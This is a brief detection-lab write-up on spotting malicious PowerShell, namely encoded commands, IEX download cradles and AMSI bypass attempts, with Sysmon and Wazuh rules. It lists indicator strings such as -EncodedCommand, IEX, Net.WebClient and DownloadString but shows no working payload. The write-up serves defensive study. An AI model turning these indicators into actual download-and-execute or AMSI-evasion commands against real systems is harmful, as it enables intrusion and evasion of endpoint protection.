Suspicious PowerShell Activity

Detect malicious PowerShell execution patterns including encoded commands, download cradles, and AMSI bypass attempts using Wazuh and Sysmon.

Lab Environment

Windows 10 (Target + Wazuh Agent + Sysmon), Windows Server 2022 (DC), Kali Linux (Attacker C2), Wazuh Manager.

Attack Scenario

Simulated post-exploitation scenario where attacker executed encoded PowerShell commands for reconnaissance, downloaded additional payloads via IEX (Invoke-Expression), and attempted AMSI bypass to evade endpoint detection.

Detection Method

Sysmon Event ID 1 captured PowerShell process creation with command-line arguments. Monitored for indicators: -EncodedCommand, -Exec Bypass, IEX, Net.WebClient, DownloadString. PowerShell Script Block Logging (Event ID 4104) captured decoded command content. Custom Wazuh rules matched known malicious patterns.